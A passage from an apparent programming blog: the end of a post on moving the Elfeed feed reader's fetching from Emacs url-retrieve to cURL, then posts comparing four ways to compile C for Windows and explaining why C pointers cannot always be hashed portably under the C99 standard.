(cl-count 2 results :key #'car)
;; => 7

(cl-count 9 results :key #'car)
;; => 1

Here’s another one, this time to the non-existent foo.example. The DNS query should never resolve.

(setf results ())
(dotimes (i 10)
  (url-retrieve "http://foo.example/"
                (lambda (status) (push (cons i status) results))))

What’s the length of results? This time it’s zero. Remember how DNS is synchronous? Because of this, DNS failures are reported synchronously as a signaled error. This gets a lot worse with url-queue-retrieve. Since the request is put off until later, DNS doesn’t fail until later, and you get neither a callback nor an error signal. This also puts the queue in a bad state and necessitated elfeed-unjam to manually clear it. This one should get fixed in Emacs 25 when DNS is asynchronous.

This last one assumes you don’t have anything listening on port 57432 (pulled out of nowhere) so that the connection fails.

(setf results ())
(dotimes (i 10)
  (url-retrieve "http://127.0.0.1:57432/"
                (lambda (status) (push (cons i status) results))))

On Linux, we finally get the sane result of 10. However, on Windows, it’s zero. The synchronous TCP connection will fail, signaling an error just like DNS failures. Not only is it broken, it’s broken in different ways on different platforms.

There are many more cases of callback weirdness which depend on the connection and HTTP session being in various states when things go awry. These were just the easiest to demonstrate. By using cURL, I get to bypass this mess.

No more GnuTLS issues

At compile time, Emacs can optionally be linked against GnuTLS, giving it robust TLS support so long as the shared library is available. url-retrieve uses this for fetching HTTPS content. Unfortunately, this library is noisy and will occasionally echo non-informational messages in the minibuffer and in *Messages* that cannot be suppressed.

When not linked against GnuTLS, Emacs will instead run the GnuTLS command line program as an inferior process, just like Elfeed now does with cURL. Unfortunately this interface is very slow and frequently fails, basically preventing Elfeed from fetching HTTPS feeds. I suspect it’s in part due to an improper coding-system-for-read.

cURL handles all the TLS negotiation itself, so both these problems disappear. The compile-time configuration doesn’t matter.

Windows is now supported

Emacs’ Windows networking code is so unstable, even in Emacs 25, that I couldn’t make any practical use of Elfeed on that platform. Even the Cygwin emacs-w32 version couldn’t cut it. It hard crashes Emacs every time I’ve tried to fetch feeds. Fortunately the inferior process code is a whole lot more stable, meaning fetching with cURL works great. As of today, you can now use Elfeed on Windows. The biggest obstacle is getting cURL installed and configured.

Interface changes

With cURL, obviously the values of url-queue-timeout and url-queue-parallel-processes no longer have any meaning to Elfeed. If you set these for yourself, you should instead call the functions elfeed-set-timeout and elfeed-set-max-connections, which will do the appropriate thing depending on the value of elfeed-use-curl. Each also comes with a getter so you can query the current value.

The deprecated elfeed-max-connections has been removed.

Feed objects now have meta tags :etag, :last-modified, and :canonical-url. The latter can identify feeds that have been moved, though it needs a real UI.

See any bugs?

If you use Elfeed, grab the current update and give the cURL fetcher a shot. Please open a ticket if you find problems. Be sure to report your Emacs version, operating system, and cURL version.

As of this writing there’s just one thing missing compared to url-queue: connection reuse. cURL supports it, so I just need to code it up.

tags: [ emacs elfeed ]

Four Ways to Compile C for Windows

I primarily work on and develop for unix-like operating systems — Linux in particular. However, when it comes to desktop applications, most potential users are on Windows. Rather than develop on Windows, which I’d rather avoid, I’ll continue developing, testing, and debugging on Linux while keeping portability in mind. Unfortunately every option I’ve found for building Windows C programs has some significant limitations. These limitations inform my approach to portability and restrict the C language features used by the program for all platforms.

As of this writing I’ve identified four different practical ways to build C applications for Windows. This information will definitely become further and further out of date as this article ages, so if you’re visiting from the future take a moment to look at the date. Except for LLVM shaking things up recently, development tooling on unix-like systems has had the same basic form for the past 15 years (i.e. dominated by GCC). While Visual C++ has been around for more than two decades, the tooling on Windows has seen more churn by comparison.

Before I get into the specifics, let me point out a glaring problem common to all four: Unicode arguments and filenames. Microsoft jumped the gun and adopted UTF-16 early. UTF-16 is a kludge, a worst of all worlds, being a variable length encoding (surrogate pairs), backwards incompatible (unlike UTF-8), and having byte-order issues (BOM). Most Win32 functions that accept strings generally come in two flavors, ANSI and UTF-16. The standard, portable C library functions wrap the ANSI-flavored functions. This means portable C programs can’t interact with Unicode filenames. They must call the non-portable, Windows-specific versions. This includes main itself, which is only handed ANSI-truncated arguments.
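
To illustrate the sort of Windows-specific code this forces (this is just a sketch of the usual workaround, not a complete solution), a program can take its arguments as UTF-16 via wmain and convert them to UTF-8 itself. With MSVC this entry point works out of the box; Mingw-w64 needs -municode.

#include <windows.h>
#include <stdio.h>
#include <wchar.h>

int
wmain(int argc, wchar_t **wargv)
{
    for (int i = 0; i < argc; i++) {
        /* Convert each UTF-16 argument to UTF-8 (long arguments are
           truncated for brevity in this sketch). */
        char buf[4096];
        WideCharToMultiByte(CP_UTF8, 0, wargv[i], -1,
                            buf, sizeof(buf), NULL, NULL);
        printf("arg %d: %s\n", i, buf);
    }
    return 0;
}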

Compare this to unix-like systems, which generally adopted UTF-8, though as a convention rather than a hard rule. The operating system doesn’t know or care about Unicode. Program arguments and filenames are just zero-terminated bytestrings. Implicitly decoding these as UTF-8 would be a mistake anyway. What happens when the encoding isn’t valid?

This doesn’t have to be a problem on Windows. A Windows standard C library could connect to Windows’ Unicode-flavored functions and encode to/from UTF-8 as needed, allowing portable programs to maintain the bytestring illusion. It’s only that none of the existing standard C libraries do it this way.

Mingw-w64

Of course my first natural choice is MinGW, specifically the Mingw-w64 fork. It’s GCC ported to Windows. You can continue relying on GCC-specific features when you need them. It’s got all the core language features up through C11, plus the common extensions. It’s probably packaged by your Linux distribution of choice, making it trivial to cross-compile programs and libraries from Linux — and with Wine you can even execute them on x86. Like regular GCC, it outputs GDB-friendly DWARF debugging information, so you can debug applications with GDB (my favorite).

If I’m using Mingw-w64 on Windows, I prefer to do so from inside Cygwin. Since it provides a complete POSIX environment, it maximizes portability for the whole tool chain. This isn’t strictly required.

However, it has one big flaw. Unlike unix-like systems, Windows doesn’t supply a system standard C library. That’s the compiler’s job. But Mingw-w64 doesn’t have one. Instead it links against msvcrt.dll, which isn’t officially supported by Microsoft. It just happens to exist on modern Windows installations. Since it’s not supported, it’s way out of date and doesn’t support much of C99, let alone C11. A lot of these problems are patched over by the compiler, but if you’re relying on Mingw-w64, you still have to stick to some C89 library features, such as limiting yourself to the C89 printf specifiers.

Update: Mārtiņš Možeiko has pointed out __USE_MINGW_ANSI_STDIO, an undocumented feature that fixes the printf family.
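
Presumably it’s used something like this, defined before any standard headers are included (or passed with -D on the command line):

/* Ask Mingw-w64 to substitute its own C99-conforming printf family
   for the ancient one in msvcrt.dll. */
#define __USE_MINGW_ANSI_STDIO 1
#include <stdio.h>

int
main(void)
{
    printf("%zu\n", sizeof(long long));  /* C99 specifiers now work */
    return 0;
}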

Visual C++

The behemoth usually considered in this situation is Visual Studio and the Visual C++ build tools. I strongly prefer open source development tools, and Visual Studio is obviously the least open source option, but at least it’s cost-free these days. Now, I have absolutely no interest in Visual Studio, but fortunately the Visual C++ compiler and associated build tools can be used standalone, supporting both C and C++.

Included is a “vcvars” batch file — vcvars64.bat for x64. Execute that batch file in a cmd.exe console and the Visual C++ command line build tools will be made available in that console and in any programs executed from it (your editor). It includes the compiler (cl.exe), linker (link.exe), assembler (ml64.exe), disassembler (dumpbin.exe), and more. It also includes a mostly POSIX-complete make called nmake.exe. All these tools are noisy and print a copyright banner on every invocation, so get used to passing -nologo every time, which suppresses some of it.

When I said behemoth, I meant it. In my experience it literally takes hours (unattended) to install Visual Studio 2015. The good news is you don’t actually need it all anymore. The build tools are available standalone. While it’s still a larger and slower installation process than it really should be, it’s much more reasonable to install. It’s good enough that I’d even say I’m comfortable relying on it for Windows builds.

That being said, it’s not without its flaws. Microsoft has never announced any plans to support C99. They only care about C++, with C as a second class citizen. Since C++11 incorporated most of C99 and Microsoft supports C++11, Visual Studio 2015 very nearly supports all of C99, even more than Mingw-w64. The only things missing as far as I can tell are variable length arrays (VLAs), complex numbers, and C99’s array parameter declarators, since none of these were adopted by C++. Some C99 features are considered extensions (as they would be for C89), so you’ll also get warnings about them, which can be disabled.

The command line interface (option flags, intermediates, etc.) isn’t quite reconcilable with the unix-like ecosystem (i.e. GCC, Clang), so you’ll need separate Makefiles, or you’ll need to use a build system that generates Visual C++ Makefiles.

Debugging is a major problem. Visual C++ outputs separate .pdb program database files, which aren’t usable from GDB. Visual Studio has a built-in debugger, though it’s not included in the standalone Visual C++ build tools. I’m still searching for a decent debugging solution for this scenario. I tried WinDbg, but I can’t stand it.

In general the output code performance is on par with GCC and Clang, so you’re not really gaining or losing performance with Visual C++.

Clang

Unsurprisingly, Clang has been ported to Windows. It’s like Mingw-w64 in that you get the same features and interface across platforms.

Unlike Mingw-w64, it doesn’t link against msvcrt.dll. Instead it relies directly on the official Windows SDK. You’ll basically need to install the Visual C++ build tools as if you were going to build with Visual C++. This means no practical cross-platform builds and you’re still relying on the proprietary Microsoft toolchain. In the past you even had to use Microsoft’s linker, but LLVM now provides its own.

It generates GDB-friendly DWARF debug information (in addition to CodeView) so in theory you can debug with GDB again. I haven’t given this a thorough evaluation yet.

Pelles C

Finally there’s Pelles C. It’s cost-free but not open source. It’s a reasonable, small install that includes a full IDE with an integrated debugger and command line tools. It has its own C library and Win32 SDK with the most complete C11 support around. It also supports OpenMP 3.1. All in all it’s pretty nice and is something I wouldn’t be afraid to rely upon for Windows builds.

Like Visual C++, it has a couple of “povars” batch files to set up the right environment, which includes a C compiler, linker, assembler, etc. The compiler interface mostly mimics cl.exe, though there are far fewer code generation options. The make program, pomake.exe, mimics nmake.exe, but is even less POSIX-complete. The compiler’s output code performance is also noticeably poorer than GCC, Clang, and Visual C++. It’s definitely a less mature compiler.

It outputs CodeView debugging information, so GDB is of no use. The best solution is to simply use the debugger built into the IDE, which can be invoked directly from the command line. You don’t normally need to code from within the IDE just to use the debugger.

Like Visual C++, it’s Windows only, so cross-compilation isn’t really in the picture.

If performance isn’t of high importance, and you don’t require specific code generation options, then Pelles C is a nice choice for Windows builds.

Other Options

I’m sure there are a few other options out there, and I’d like to hear about them so I can try them out. I focused on these since they’re all cost free and easy to download. If I have to register or pay, then it’s not going to beat these options.

tags: [ c cpp win32 ]

You Can't Always Hash Pointers in C

Occasionally I’ve needed to key a hash table with C pointers. I don’t care about the contents of the object itself — especially if it might change — just its pointer identity. For example, suppose I’m using null-terminated strings as keys and I know these strings will always be interned in a common table. These strings can be compared directly by their pointer values (str_a == str_b) rather than, more slowly, by their contents (strcmp(str_a, str_b) == 0). The intern table ensures that these expressions both have the same result.

As a key in a hash table, or other efficient map/dictionary data structure, I’ll need to turn pointers into numerical values. However, C pointers aren’t integers. Following certain rules it’s permitted to cast pointers to integers and back, but doing so will reduce the program’s portability. The most important consideration is that the integer form isn’t guaranteed to have any meaningful or stable value. In other words, even in a conforming implementation, the same pointer might cast to two different integer values. This would break any algorithm that isn’t keenly aware of the implementation details.
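
For example, a typical pointer-identity hash, a minimal sketch relying on uintptr_t and on the cast producing a stable, meaningful value, might look like this (hash_pointer and the multiplier are my own, arbitrary choices):

#include <stdint.h>

/* Hash a pointer by its identity. This leans on (uintptr_t)p being
   stable and meaningful, which, as discussed below, is only an
   implementation-defined convention. */
uint64_t
hash_pointer(const void *p)
{
    uint64_t x = (uintptr_t)p;
    x ^= x >> 32;
    x *= UINT64_C(0xd6e8feb86659fd93);  /* arbitrary odd multiplier */
    x ^= x >> 32;
    return x;
}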

To show why this is, I’m going to be citing the relevant parts of the C99 standard (ISO/IEC 9899:1999). The draft for C99 is freely available (and what I use myself since I’m a cheapass). My purpose is not to discourage you from casting pointers to integers and using the result. The vast majority of the time this works fine and as you would expect. I just think it’s an interesting part of the language, and C/C++ programmers should be aware of the potential trade-offs.

Integer to pointer casts

What does the standard have to say about casting pointers to integers? §6.3.2.3¶5:

An integer may be converted to any pointer type. Except as previously specified, the result is implementation-defined, might not be correctly aligned, might not point to an entity of the referenced type, and might be a trap representation.

It also includes a footnote:

The mapping functions for converting a pointer to an integer or an integer to a pointer are intended to be consistent with the addressing structure of the execution environment.

Casting an integer to a pointer depends entirely on the implementation. This is intended for things like memory mapped hardware. The programmer may need to access memory as a specific physical address, which would be encoded in the source as an integer constant and cast to a pointer of the appropriate type.

int
read_sensor_voltage(void)
{
    return *(int *)0x1ffc;
}

It may also be used by a loader and dynamic linker to compute the virtual address of various functions and variables, then cast to a pointer before use.

Both cases are already dependent on implementation defined behavior, so there’s nothing lost in relying on these casts.

An integer constant expression of 0 is a special case. It casts to a NULL pointer in all implementations (§6.3.2.3¶3). However, a NULL pointer doesn’t necessarily point to address zero, nor is it necessarily a zero bit pattern (i.e. beware memset and calloc on memory with pointers). It’s just guaranteed never to compare equally with a valid object, and it is undefined behavior to dereference.
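
For example, this sketch (the struct is purely illustrative) is not guaranteed to leave next as a null pointer, even though it nearly always does in practice:

#include <string.h>

struct node {
    struct node *next;
    int value;
};

void
clear_node(struct node *n)
{
    /* All-bits-zero is not necessarily the null pointer representation. */
    memset(n, 0, sizeof(*n));

    /* Portable: assign the null pointer constant explicitly. */
    n->next = 0;
    n->value = 0;
}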

Pointer to integer casts

What about the other way around? §6.3.2.3¶6:

Any pointer type may be converted to an integer type. Except as previously specified, the result is implementation-defined. If the result cannot be represented in the integer type, the behavior is undefined. The result need not be in the range of values of any integer type.

Like before, it’s implementation defined. However, the negatives are a little stronger: the cast itself may be undefined behavior. I speculate this is tied to integer overflow. The last part makes pointer to integer casts optional for an implementation. This is one way that the hash table above would be less portable.

When the cast is always possible, an implementation can provide an integer type wide enough to hold any pointer value. §7.18.1.4¶1:

The following type designates a signed integer type with the property that any valid pointer to void can be converted to this type, then converted back to pointer to void, and the result will compare equal to the original pointer:

intptr_t

The following type designates an unsigned integer type with the property that any valid pointer to void can be converted to this type, then converted back to pointer to void, and the result will compare equal to the original pointer:

uintptr_t

These types are optional.

The take-away is that the integer has no meaningful value. The only guarantee is that the integer can be cast back into a void pointer that will compare equally. It would be perfectly legal for an implementation to pass these assertions (and still sometimes fail).

void
example(void *ptr_a, void *ptr_b)
{
    if (ptr_a == ptr_b) {
        uintptr_t int_a = (uintptr_t)ptr_a;
        uintptr_t int_b = (uintptr_t)ptr_b;
        assert(int_a != int_b);
        assert((void *)int_a == (void *)int_b);
    }
}

Since the bits don’t have any particular meaning, arithmetic operations involving them will also have no meaning. When a pointer might map to two different integers, the hash values might not match up, breaking hash tables that rely on them. Even with uintptr_t provided, casting pointers to integers isn’t useful without also relying on implementation defined properties of the result.

Reasons for this pointer insanity

What purpose could such strange pointer-to-integer casts serve?

A security-conscious implementation may choose to annotate pointers with additional information by setting unused bits. It might be for baggy bounds checks or, someday, in an undefined behavior sanitizer. Before dereferencing annotated pointers, the metadata bits would be checked for validity, and cleared/set before use as an address. Or it may map the same object at multiple virtual addresses to avoid setting/clearing the metadata bits, providing interoperability with code unaware of the annotations. When pointers are compared, these bits would be ignored.

When these annotated pointers are cast to integers, the metadata bits will be present, but a program using the integer wouldn’t know their meaning without tying itself closely to that implementation. Completely unused bits may even be filled with random garbage when cast. It’s allowed.

You may have been thinking about using a union or char * to bypass the cast and access the raw pointer bytes, but you’d run into the same problems on the same implementations.

Conforming programs

The standard makes a distinction between strictly conforming programs (§4¶5) and conforming programs (§4¶7). A strictly conforming program must not produce output depending on implementation defined behavior nor exceed minimum implementation limits. Very few programs fit in this category, and any program using uintptr_t doesn’t, since the type is optional. Here are more examples of code that isn’t strictly conforming:

    printf("%zu", sizeof(int)); // §6.5.3.4
    printf("%d", -1 >> 1);      // §6.5¶4
    printf("%d", MAX_INT);      // §5.2.4.2.1

On the other hand, a conforming program is allowed to depend on implementation defined behavior. Relying on meaningful, stable values for pointers cast to uintptr_t/intptr_t is conforming even if your program may exhibit bugs on some implementations.

tags: [ c cpp ]